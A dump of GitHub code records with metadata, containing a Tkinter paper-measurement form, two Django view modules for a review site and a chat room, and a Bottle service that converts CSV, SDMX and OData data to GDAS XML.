Label(secondWindow, text=\"Opacidade - TELA:\")\nlabelFluorescenciaTela = Label(secondWindow, text=\"Fluorescência - TELA:\")\nlabelAlvuraD65Tela = Label(secondWindow, text=\"Alvura D65 - TELA:\")\n\nentryLuminFeltro = Entry(secondWindow)\nentryCoordAFeltro = Entry(secondWindow)\nentryCoordBFeltro = Entry(secondWindow)\nentryAlvuraISOFeltro = Entry(secondWindow)\nentryBrancuraFeltro = Entry(secondWindow)\nentryOpacidadeFeltro = Entry(secondWindow)\nentryFluorescenciaFeltro = Entry(secondWindow)\nentryAlvuraD65TelaFeltro = Entry(secondWindow)\n\nlabelLuminFeltro = Label(secondWindow, text=\"Lumin. L - FELTRO:\")\nlabelCoordAFeltro = Label(secondWindow, text=\"Coord. A - FELTRO:\")\nlabelCoordBFeltro = Label(secondWindow, text=\"Coord. B - FELTRO:\")\nlabelAlvuraISOFeltro = Label(secondWindow, text=\"Alvura ISO - FELTRO:\")\nlabelBrancuraFeltro = Label(secondWindow, text=\"Brancura - FELTRO:\")\nlabelOpacidadeFeltro = Label(secondWindow, text=\"Opacidade - FELTRO:\")\nlabelFluorescenciaFeltro = Label(secondWindow, text=\"Fluorescência - FELTRO:\")\nlabelAlvuraD65TelaFeltro = Label(secondWindow, text=\"Alvura D65 - FELTRO:\")\n\t\nsaveResultsButton = Button(secondWindow, text=\"Salvar\", command=saveTestResults, width=10)\nbackButton = Button(secondWindow, text=\"Voltar\", command=goBack, width=10)\n\nroot.mainloop()\n\n# import os\n# os.chdir(\"C:/Users/\")\n# os.getcwd()\n# 'C:\\\\Users'\n\n# list.remove(x), Remove the first item from the list whose value is x. It is an error if there is no such item.\n", "repo_name": "Thiago-Nascimento/AppFOs", "sub_path": "teste/analisaFO.py", "file_name": "analisaFO.py", "file_ext": "py", "file_size_in_byte": 26727, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.chdir", "line_number": 12, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 192, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 192, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 193, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 193, "usage_type": "attribute"}, {"api_name": "getpass.getuser", "line_number": 201, "usage_type": "call"}, {"api_name": "tkinter.messagebox.showinfo", "line_number": 215, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 215, "usage_type": "name"}, {"api_name": "tkinter.messagebox.showerror", "line_number": 248, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 248, "usage_type": "name"}, {"api_name": "tkinter.messagebox.showerror", "line_number": 252, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 252, "usage_type": "name"}, {"api_name": "tkinter.messagebox.showerror", "line_number": 255, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 255, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 291, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 291, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 292, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 292, "usage_type": "attribute"}, {"api_name": "getpass.getuser", "line_number": 300, "usage_type": "call"}, {"api_name": "tkinter.messagebox.showinfo", "line_number": 312, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 312, "usage_type": "name"}, {"api_name": "tkinter.messagebox.showerror", "line_number": 341, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 341, "usage_type": "name"}, {"api_name": "tkinter.messagebox.showerror", "line_number": 344, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 344, "usage_type": "name"}, {"api_name": "tkinter.messagebox.showerror", "line_number": 346, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 346, "usage_type": "name"}, {"api_name": "tkinter.messagebox.showerror", "line_number": 737, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 737, "usage_type": "name"}, {"api_name": "tkinter.ttk.Combobox", "line_number": 752, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 752, "usage_type": "name"}]} +{"seq_id": "19310429825", "text": "from django.shortcuts import render, redirect, get_object_or_404\nfrom django.contrib.auth.decorators import login_required\n\nfrom itertools import chain\n\nfrom authentification.models import User\nfrom review.models import Ticket, Review, UserFollows\nfrom review.forms import TicketForm, ReviewForm, TicketReviewForm\n\n\ndef get_followed_user(user):\n followed_users = []\n for link in UserFollows.objects.filter(user=user):\n followed_users.append(link.followed_user)\n return followed_users\n\n\ndef get_followers(user):\n followers = []\n for link in UserFollows.objects.filter(followed_user=user):\n followers.append(link.user)\n return followers\n\n\ndef get_users_viewable_tickets(user):\n tickets = []\n followed_users = get_followed_user(user)\n followed_users.append(user)\n for followed_user in followed_users:\n tickets.extend(Ticket.objects.filter(user=followed_user))\n return tickets\n\n\ndef get_users_viewable_reviews(user):\n reviews = []\n followed_users = get_followed_user(user)\n followed_users.append(user)\n my_tickets = Ticket.objects.filter(user=user)\n for ticket in my_tickets:\n relative_reviews = Review.objects.filter(ticket=ticket)\n for review in relative_reviews:\n if review.user not in followed_users:\n reviews.append(review)\n for followed_user in followed_users:\n reviews.extend(Review.objects.filter(user=followed_user))\n return reviews\n\n\ndef annotate_post(posts):\n response = []\n for post in posts:\n if isinstance(post, Ticket):\n obj = {'content': post, 'type': 'TICKET'}\n elif isinstance(post, Review):\n obj = {'content': post, 'type': 'REVIEW'}\n response.append(obj)\n return response\n\n\n@login_required(login_url='home')\ndef flux(request):\n tickets = get_users_viewable_tickets(request.user)\n reviews = get_users_viewable_reviews(request.user)\n for ticket in tickets:\n if Review.objects.filter(ticket=ticket):\n ticket.answered = True\n posts = sorted(chain(tickets, reviews),\n key=lambda post: post.time_created,\n reverse=True)\n context = {'posts': annotate_post(posts)}\n return render(request, 'review/flux.html', context)\n\n\n@login_required(login_url='home')\ndef create_ticket(request, id_ticket=None):\n if id_ticket is not None:\n ticket = get_object_or_404(Ticket, pk=id_ticket)\n else:\n ticket = Ticket(user=request.user)\n if request.method == 'GET':\n form = TicketForm(instance=ticket)\n return render(request, 'review/addticket.html', {'form': form})\n elif request.method == 'POST':\n form = TicketForm(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n return redirect('flux')\n else:\n return render(request, 'review/addticket.html', {'form': form})\n\n\n@login_required(login_url='home')\ndef modify_ticket(request, id_ticket):\n context = {}\n ticket = get_object_or_404(Ticket, pk=id_ticket)\n if request.method == 'GET':\n if ticket is None:\n pass\n else:\n form = TicketForm(instance=ticket)\n context['form'] = form\n return render(request, 'review/addticket.html', context)\n elif request.method == 'POST':\n form = TicketForm(request.POST, request.FILES, instance=ticket)\n if form.is_valid():\n form.save()\n return redirect('posts')\n\n\n@login_required(login_url='home')\ndef delete_ticket(request, id_ticket):\n ticket = get_object_or_404(Ticket, pk=id_ticket)\n ticket.delete()\n return redirect('posts')\n\n\n@login_required(login_url='home')\ndef create_review(request, id_ticket=None):\n review = None\n context = {}\n if id_ticket is not None:\n ticket = get_object_or_404(Ticket, pk=id_ticket)\n context = {'post': {'content': ticket}}\n review = Review(ticket=ticket,\n rating=None,\n headline=None,\n body=None,\n user=request.user,\n time_created=None)\n else:\n review = Review(ticket=None,\n rating=None,\n headline=None,\n body=None,\n user=request.user,\n time_created=None)\n if request.method == 'GET':\n form = ReviewForm(instance=review)\n context['form'] = form\n return render(request, 'review/addreview.html', context)\n elif request.method == 'POST':\n form = ReviewForm(request.POST)\n if form.is_valid():\n form.save()\n ticket.save()\n return redirect('flux')\n else:\n return render(request, 'review/addreview.html', context)\n\n\n@login_required(login_url='home')\ndef modify_review(request, id_review):\n context = {}\n review = get_object_or_404(Review, pk=id_review)\n if request.method == 'GET':\n if review is None:\n pass\n else:\n form = ReviewForm(instance=review)\n context = {'post': {'content': review.ticket}, 'form': form}\n return render(request, 'review/addreview.html', context)\n elif request.method == 'POST':\n form = ReviewForm(request.POST, instance=review)\n if form.is_valid():\n form.save()\n return redirect('posts')\n\n\n@login_required(login_url='home')\ndef delete_review(request, id_review):\n review = get_object_or_404(Review, pk=id_review)\n review.ticket.answered = False\n review.delete()\n return redirect('posts')\n\n\n@login_required(login_url='home')\ndef create_ticketreview(request):\n if request.method == 'GET':\n form = TicketReviewForm()\n return render(request, 'review/addticketreview.html', {'form': form})\n elif request.method == 'POST':\n data = request.POST\n ticket_form = TicketForm({'title': data['ticket_title'],\n 'user': request.user,\n 'description': data['ticket_description'],\n 'image': data['ticket_image']})\n if ticket_form.is_valid():\n ticket = ticket_form.save()\n review_form = ReviewForm({'ticket': ticket,\n 'rating': data['review_rating'],\n 'headline': data['review_headline'],\n 'body': data['review_body'],\n 'user': request.user})\n if review_form.is_valid():\n review_form.save()\n return redirect('flux')\n\n\n@login_required(login_url='home')\ndef follow(request):\n context = {}\n if request.method == 'GET':\n followed_users = get_followed_user(request.user)\n followers = get_followers(request.user)\n context = {'followed_users': followed_users, 'followers': followers}\n return render(request, 'review/follow.html', context)\n elif request.method == 'POST':\n new_followed_user = User.objects.filter(username=request.POST['new_followed_user'])[0]\n if new_followed_user:\n UserFollows.objects.create(user=request.user, followed_user=new_followed_user)\n return redirect('follow')\n\n\n@login_required(login_url='home')\ndef delete_follow(request, id_followed_user):\n followed_user = get_object_or_404(User, pk=id_followed_user)\n link = get_object_or_404(UserFollows, user=request.user, followed_user=followed_user)\n link.delete()\n return redirect('follow')\n\n\n@login_required(login_url='home')\ndef posts(request):\n tickets = Ticket.objects.filter(user=request.user)\n reviews = Review.objects.filter(user=request.user)\n for ticket in tickets:\n if Review.objects.filter(ticket=ticket):\n ticket.answered = True\n posts = sorted(chain(tickets, reviews),\n key=lambda post: post.time_created,\n reverse=True)\n context = {'posts': annotate_post(posts)}\n return render(request, 'review/posts.html', context)\n", "repo_name": "S0Imyr/Projet-9", "sub_path": "Projet9/review/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 8140, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "review.models.UserFollows.objects.filter", "line_number": 13, "usage_type": "call"}, {"api_name": "review.models.UserFollows.objects", "line_number": 13, "usage_type": "attribute"}, {"api_name": "review.models.UserFollows", "line_number": 13, "usage_type": "name"}, {"api_name": "review.models.UserFollows.objects.filter", "line_number": 20, "usage_type": "call"}, {"api_name": "review.models.UserFollows.objects", "line_number": 20, "usage_type": "attribute"}, {"api_name": "review.models.UserFollows", "line_number": 20, "usage_type": "name"}, {"api_name": "review.models.Ticket.objects.filter", "line_number": 30, "usage_type": "call"}, {"api_name": "review.models.Ticket.objects", "line_number": 30, "usage_type": "attribute"}, {"api_name": "review.models.Ticket", "line_number": 30, "usage_type": "name"}, {"api_name": "review.models.Ticket.objects.filter", "line_number": 38, "usage_type": "call"}, {"api_name": "review.models.Ticket.objects", "line_number": 38, "usage_type": "attribute"}, {"api_name": "review.models.Ticket", "line_number": 38, "usage_type": "name"}, {"api_name": "review.models.Review.objects.filter", "line_number": 40, "usage_type": "call"}, {"api_name": "review.models.Review.objects", "line_number": 40, "usage_type": "attribute"}, {"api_name": "review.models.Review", "line_number": 40, "usage_type": "name"}, {"api_name": "review.models", "line_number": 41, "usage_type": "name"}, {"api_name": "review.models.user", "line_number": 42, "usage_type": "attribute"}, {"api_name": "review.models", "line_number": 42, "usage_type": "name"}, {"api_name": "review.models", "line_number": 43, "usage_type": "argument"}, {"api_name": "review.models.Review.objects.filter", "line_number": 45, "usage_type": "call"}, {"api_name": "review.models.Review.objects", "line_number": 45, "usage_type": "attribute"}, {"api_name": "review.models.Review", "line_number": 45, "usage_type": "name"}, {"api_name": "review.models.Ticket", "line_number": 52, "usage_type": "argument"}, {"api_name": "review.models.Review", "line_number": 54, "usage_type": "argument"}, {"api_name": "review.models.Review.objects.filter", "line_number": 65, "usage_type": "call"}, {"api_name": "review.models.Review.objects", "line_number": 65, "usage_type": "attribute"}, {"api_name": "review.models.Review", "line_number": 65, "usage_type": "name"}, {"api_name": "itertools.chain", "line_number": 67, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 71, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 60, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 77, "usage_type": "call"}, {"api_name": "review.models.Ticket", "line_number": 77, "usage_type": "argument"}, {"api_name": "review.models.Ticket", "line_number": 79, "usage_type": "call"}, {"api_name": "review.forms.TicketForm", "line_number": 81, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 82, "usage_type": "call"}, {"api_name": "review.forms.TicketForm", "line_number": 84, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 87, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 89, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 74, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 95, "usage_type": "call"}, {"api_name": "review.models.Ticket", "line_number": 95, "usage_type": "argument"}, {"api_name": "review.forms.TicketForm", "line_number": 100, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 102, "usage_type": "call"}, {"api_name": "review.forms.TicketForm", "line_number": 104, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 107, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 92, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 112, "usage_type": "call"}, {"api_name": "review.models.Ticket", "line_number": 112, "usage_type": "argument"}, {"api_name": "django.shortcuts.redirect", "line_number": 114, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 110, "usage_type": "call"}, {"api_name": "review.models", "line_number": 119, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 122, "usage_type": "call"}, {"api_name": "review.models.Ticket", "line_number": 122, "usage_type": "argument"}, {"api_name": "review.models", "line_number": 124, "usage_type": "name"}, {"api_name": "review.models.Review", "line_number": 124, "usage_type": "call"}, {"api_name": "review.models", "line_number": 131, "usage_type": "name"}, {"api_name": "review.models.Review", "line_number": 131, "usage_type": "call"}, {"api_name": "review.forms.ReviewForm", "line_number": 138, "usage_type": "call"}, {"api_name": "review.models", "line_number": 138, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 140, "usage_type": "call"}, {"api_name": "review.forms.ReviewForm", "line_number": 142, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 146, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 148, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 117, "usage_type": "call"}, {"api_name": "review.models", "line_number": 154, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 154, "usage_type": "call"}, {"api_name": "review.models.Review", "line_number": 154, "usage_type": "argument"}, {"api_name": "review.models", "line_number": 156, "usage_type": "name"}, {"api_name": "review.forms.ReviewForm", "line_number": 159, "usage_type": "call"}, {"api_name": "review.models", "line_number": 159, "usage_type": "name"}, {"api_name": "review.models.ticket", "line_number": 160, "usage_type": "attribute"}, {"api_name": "review.models", "line_number": 160, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 161, "usage_type": "call"}, {"api_name": "review.forms.ReviewForm", "line_number": 163, "usage_type": "call"}, {"api_name": "review.models", "line_number": 163, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 166, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 151, "usage_type": "call"}, {"api_name": "review.models", "line_number": 171, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 171, "usage_type": "call"}, {"api_name": "review.models.Review", "line_number": 171, "usage_type": "argument"}, {"api_name": "review.models.ticket", "line_number": 172, "usage_type": "attribute"}, {"api_name": "review.models", "line_number": 172, "usage_type": "name"}, {"api_name": "review.models.delete", "line_number": 173, "usage_type": "call"}, {"api_name": "review.models", "line_number": 173, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 174, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 169, "usage_type": "call"}, {"api_name": "review.forms.TicketReviewForm", "line_number": 180, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 181, "usage_type": "call"}, {"api_name": "review.forms.TicketForm", "line_number": 184, "usage_type": "call"}, {"api_name": "review.forms.ReviewForm", "line_number": 190, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 197, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 177, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 207, "usage_type": "call"}, {"api_name": "authentification.models.User.objects.filter", "line_number": 209, "usage_type": "call"}, {"api_name": "authentification.models.User.objects", "line_number": 209, "usage_type": "attribute"}, {"api_name": "authentification.models.User", "line_number": 209, "usage_type": "name"}, {"api_name": "review.models.UserFollows.objects.create", "line_number": 211, "usage_type": "call"}, {"api_name": "review.models.UserFollows.objects", "line_number": 211, "usage_type": "attribute"}, {"api_name": "review.models.UserFollows", "line_number": 211, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 212, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 200, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 217, "usage_type": "call"}, {"api_name": "authentification.models.User", "line_number": 217, "usage_type": "argument"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 218, "usage_type": "call"}, {"api_name": "review.models.UserFollows", "line_number": 218, "usage_type": "argument"}, {"api_name": "django.shortcuts.redirect", "line_number": 220, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 215, "usage_type": "call"}, {"api_name": "review.models.Ticket.objects.filter", "line_number": 225, "usage_type": "call"}, {"api_name": "review.models.Ticket.objects", "line_number": 225, "usage_type": "attribute"}, {"api_name": "review.models.Ticket", "line_number": 225, "usage_type": "name"}, {"api_name": "review.models.Review.objects.filter", "line_number": 226, "usage_type": "call"}, {"api_name": "review.models.Review.objects", "line_number": 226, "usage_type": "attribute"}, {"api_name": "review.models.Review", "line_number": 226, "usage_type": "name"}, {"api_name": "review.models.Review.objects.filter", "line_number": 228, "usage_type": "call"}, {"api_name": "review.models.Review.objects", "line_number": 228, "usage_type": "attribute"}, {"api_name": "review.models.Review", "line_number": 228, "usage_type": "name"}, {"api_name": "itertools.chain", "line_number": 230, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 234, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 223, "usage_type": "call"}]} +{"seq_id": "36603939655", "text": "from django.shortcuts import render\nfrom app.models import Room\n\nfrom re import match\n\n\ndef index_view(request):\n return render(request, 'index.html', {\n 'rooms': Room.objects.all(),\n })\n\n\ndef room_view(request, room_name):\n # if room name valid\n if match(\"^[A-Za-z0-9_]*$\", room_name):\n chat_room, created = Room.objects.get_or_create(name=room_name)\n # connect if less than 2 people\n if Room.objects.get_or_create(name=room_name)[0].get_online_count() <= 2:\n return render(request, 'room.html', {\n 'room': chat_room,\n })\n else:\n return render(request, 'index.html', {\n 'rooms': Room.objects.all(),\n 'error': 'Unable to join: This room is full!',\n })\n # otherwise redirect to home\n else:\n return render(request, 'index.html', {\n 'rooms': Room.objects.all(),\n 'error': 'Unable to create room: Invalid name!',\n })", "repo_name": "timo-w/dissertation", "sub_path": "app/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 990, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.shortcuts.render", "line_number": 8, "usage_type": "call"}, {"api_name": "app.models.Room.objects.all", "line_number": 9, "usage_type": "call"}, {"api_name": "app.models.Room.objects", "line_number": 9, "usage_type": "attribute"}, {"api_name": "app.models.Room", "line_number": 9, "usage_type": "name"}, {"api_name": "re.match", "line_number": 15, "usage_type": "call"}, {"api_name": "app.models.Room.objects.get_or_create", "line_number": 16, "usage_type": "call"}, {"api_name": "app.models.Room.objects", "line_number": 16, "usage_type": "attribute"}, {"api_name": "app.models.Room", "line_number": 16, "usage_type": "name"}, {"api_name": "app.models.Room.objects.get_or_create", "line_number": 18, "usage_type": "call"}, {"api_name": "app.models.Room.objects", "line_number": 18, "usage_type": "attribute"}, {"api_name": "app.models.Room", "line_number": 18, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 19, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 23, "usage_type": "call"}, {"api_name": "app.models.Room.objects.all", "line_number": 24, "usage_type": "call"}, {"api_name": "app.models.Room.objects", "line_number": 24, "usage_type": "attribute"}, {"api_name": "app.models.Room", "line_number": 24, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 29, "usage_type": "call"}, {"api_name": "app.models.Room.objects.all", "line_number": 30, "usage_type": "call"}, {"api_name": "app.models.Room.objects", "line_number": 30, "usage_type": "attribute"}, {"api_name": "app.models.Room", "line_number": 30, "usage_type": "name"}]} +{"seq_id": "28852088468", "text": "# -*- coding: utf-8 -*-\n\"\"\"to-gdas\n\nto-gdas is a webservice that converts several data formats to GDAS.\n\nIf conversion is succesful, the service will return a GDAS file with status 200\n\"\"\"\n\nfrom bottle import Bottle, run, request, response, abort\nfrom lxml import etree\nimport logging\nimport json\nimport requests\nimport messytables as mt\nimport markdown\nimport io\nimport re\n\nlogging.basicConfig(format='%(levelname)s:%(module)s:%(message)s',\n level=logging.INFO)\n\nwith open('config.json', 'r') as f:\n cfg = json.load(f)\n\nwith open('readme.md', 'r') as f:\n text = f.read()\n index_html = markdown.markdown(text)\n\napp = Bottle()\n\n\ndef xstr(s):\n \"\"\"Just like str(), but return an empty string instead of None.\"\"\"\n if s is None:\n return ''\n else:\n return str(s)\n\n\ndef get_framework(tjs_url, framework_uri):\n \"\"\"Fetch framework from remote server and return as XML element.\"\"\"\n payload = {'service': 'TJS',\n 'version': '1.0.0',\n 'request': 'DescribeFrameworks',\n 'FrameworkURI': framework_uri}\n y = requests.get(tjs_url, params=payload, verify=False)\n xml = etree.fromstring(y.content)\n xml_temp = etree.tostring(xml[0])\n # Quick&dirty removal of namespace prefix\n root = xml_temp.replace(b'ns0:', b'')\n parser = etree.XMLParser(ns_clean=True, encoding='utf-8')\n framework = etree.fromstring(root, parser=parser)\n\n return framework\n\n\ndef get_csv(csv_url, csv_key):\n \"\"\"Fetch and proces external CSV-file and return dataset XML fragment.\"\"\"\n y = requests.get(csv_url, verify=False)\n f = io.BytesIO(y.content)\n\n table_set = mt.CSVTableSet(f)\n row_set = table_set.tables[0]\n offset, headers = mt.headers_guess(row_set.sample)\n row_set.register_processor(mt.headers_processor(headers))\n row_set.register_processor(mt.offset_processor(offset + 1))\n types = mt.type_guess(row_set.sample, strict=True)\n row_set.register_processor(mt.types_processor(types))\n\n # Get dataset title from filename\n dataset_title = re.split('\\.|\\/', csv_url)[-2]\n\n dataset = etree.Element(\"Dataset\")\n etree.SubElement(dataset, \"DatasetURI\").text = 'N_A'\n etree.SubElement(dataset, \"Organization\").text = 'N_A'\n etree.SubElement(dataset, \"Title\").text = dataset_title[:25]\n etree.SubElement(dataset, \"Abstract\").text = 'N_A'\n etree.SubElement(dataset, \"ReferenceDate\").text = 'N_A'\n etree.SubElement(dataset, \"Version\").text = '0'\n etree.SubElement(dataset, \"Documentation\").text = 'N_A'\n columnset = etree.SubElement(dataset, \"Columnset\")\n fkey = etree.SubElement(\n columnset,\n \"FrameworkKey\",\n complete=\"true\",\n relationship=\"one\")\n attrib = etree.SubElement(columnset, \"Attributes\")\n\n for header in (row_set.sample.__next__()):\n header_type = type(header.type).__name__.lower()[:-4]\n if header.column == csv_key:\n col = etree.SubElement(\n fkey,\n \"Column\",\n name=header.column,\n type=\"http://www.w3.org/TR/xmlschema-2/#\" + header_type,\n length=\"255\")\n else:\n col = etree.SubElement(\n attrib,\n \"Column\",\n name=header.column,\n type=\"http://www.w3.org/TR/xmlschema-2/#\" + header_type,\n length=\"255\")\n etree.SubElement(col, \"Title\").text = \"N_A\"\n etree.SubElement(col, \"Abstract\").text = \"N_A\"\n rowset = etree.SubElement(dataset, \"Rowset\")\n\n # For some reason the offset doesn't work, so we skip the headers with\n # a workaround\n iter_rows = iter(row_set)\n next(iter_rows)\n for row in iter_rows:\n rw = etree.SubElement(rowset, \"Row\")\n for cell in row:\n if cell.column == csv_key:\n k = etree.Element(\"K\")\n k.text = str(cell.value)\n rw.insert(0, k)\n else:\n k = etree.SubElement(rw, \"V\")\n k.text = str(cell.value)\n\n return dataset\n\n\ndef get_sdmx(sdmx_url):\n \"\"\"Fetch and proces external SDMX-file and return dataset XML fragment.\"\"\"\n y = requests.get(sdmx_url, verify=False)\n xml = etree.fromstring(y.content)\n xslt_root = etree.parse(\"xslt/sdmx-gdas.xsl\")\n transform = etree.XSLT(xslt_root)\n dataset = etree.fromstring(str((transform(xml))))\n\n return dataset\n\n\ndef get_odata(odata_url):\n \"\"\"Fetch and proces external ODATA-file and return dataset XML fragment.\"\"\"\n y = requests.get(odata_url, verify=False)\n data = y.json()\n # Get root_url\n root_url = data['odata.metadata'].split('$')[0]\n # Get TableInfos\n dataset = etree.Element(\"Dataset\")\n y = requests.get(root_url + 'TableInfos', verify=False)\n tbl = y.json()['value'][0]\n etree.SubElement(dataset, \"DatasetURI\").text = odata_url\n etree.SubElement(dataset, \"Organization\").text = tbl['Catalog']\n etree.SubElement(dataset, \"Title\").text = tbl['Title']\n etree.SubElement(dataset, \"Abstract\").text = tbl['Summary']\n etree.SubElement(dataset, \"ReferenceDate\").text = tbl['Period']\n etree.SubElement(dataset, \"Version\").text = '0'\n etree.SubElement(dataset, \"Documentation\").text = 'N_A'\n\n # Construct filter for DataProperties\n odata_keys = (data['value'][0].keys())\n\n odata_key_filter = \"Type ne 'TopicGroup' and (Type eq 'GeoDimension'\"\n odata_key_filter += \" or Type eq 'GeoDetail'\"\n\n for key in odata_keys:\n odata_key_filter += \" or Key eq '{0}'\".format(key)\n odata_key_filter += ')'\n\n # Get DataProperties\n y = requests.get(root_url +\n 'DataProperties?$filter=' + odata_key_filter, verify=False)\n\n data_properties = y.json()\n columnset = etree.SubElement(dataset, \"Columnset\")\n fkey = etree.SubElement(\n columnset,\n \"FrameworkKey\",\n complete=\"true\",\n relationship=\"one\")\n attrib = etree.SubElement(columnset, \"Attributes\")\n col_pos = []\n for column in data_properties['value']:\n if column['Type'] in ('GeoDimension', 'GeoDetail'):\n col = etree.SubElement(\n fkey,\n \"Column\",\n name=column['Key'],\n type=\"http://www.w3.org/TR/xmlschema-2/#string\",\n length=\"255\")\n col_pos.insert(0, [column['Position'], column['Key'], 'K'])\n else:\n col = etree.SubElement(\n attrib,\n \"Column\",\n name=column['Key'],\n type=\"http://www.w3.org/TR/xmlschema-2/#string\",\n length=\"255\")\n etree.SubElement(col, \"Title\").text = column['Title']\n etree.SubElement(col, \"Abstract\").text = column['Description']\n col_pos.append([column['Position'], column['Key'], 'V'])\n rowset = etree.SubElement(dataset, \"Rowset\")\n rows = data['value']\n for row in rows:\n rw = etree.SubElement(rowset, \"Row\")\n for col in col_pos:\n k = etree.SubElement(rw, col[2])\n k.text = xstr(row[col[1]])\n\n return dataset\n\n\n@app.route('/', method='GET')\ndef index():\n return index_html\n\n\n@app.route('/convert/', method='GET')\ndef convert(filetype):\n tjs_url = request.params.tjs_url\n framework_uri = request.params.framework_uri\n dataset_url = request.params.dataset_url\n dataset_key = request.params.dataset_key\n\n if filetype not in ('sdmx', 'odata', 'csv'):\n abort(404, 'No valid endpoint. Must be: sdmx, odata or csv')\n\n if tjs_url is None or tjs_url == '':\n abort(400, \"tjs_url must have a value\")\n\n if framework_uri is None or framework_uri == '':\n abort(400, \"framework_uri must have a value\")\n\n if dataset_url is None or dataset_url == '':\n abort(400, \"dataset_url must have a value\")\n\n if filetype == 'csv' and (dataset_key is None or dataset_key == ''):\n abort(400, \"dataset_key must have a value\")\n\n logging.info('tjs_url: ' + tjs_url)\n logging.info('framework_uri: ' + framework_uri)\n logging.info('dataset_url: ' + dataset_url)\n logging.info('dataset_key: ' + dataset_key)\n\n # Setup XML elements\n root = etree.Element(\n \"GDAS\",\n version=\"1.0\",\n service=\"TJS\",\n capabilities=\"http://sis.agr.gc.ca/pls/meta/tjs_1x0_getcapabilities\",\n xmlns=\"http://www.opengis.net/tjs/1.0\")\n\n try:\n framework = get_framework(tjs_url, framework_uri)\n\n except Exception as err:\n logging.error(err)\n abort(500, 'Error getting framework from TJS. '\n 'Please check tjs_url and framework_uri')\n\n root.append(framework)\n\n try:\n if filetype == 'sdmx':\n dataset = get_sdmx(dataset_url)\n elif filetype == 'odata':\n dataset = get_odata(dataset_url)\n elif filetype == 'csv':\n dataset = get_csv(dataset_url, dataset_key)\n except Exception as err:\n logging.error(err)\n abort(500, 'Error getting dataset. '\n 'Please check dataset_url')\n\n root[0].append(dataset)\n\n response.content_type = 'application/xml'\n return etree.tostring(root)\n\nrun(app, host=cfg['host'], port=cfg['port'], server='waitress')\n", "repo_name": "joostvenema/to-gdas", "sub_path": "webapp.py", "file_name": "webapp.py", "file_ext": "py", "file_size_in_byte": 9215, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.basicConfig", "line_number": 19, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 20, 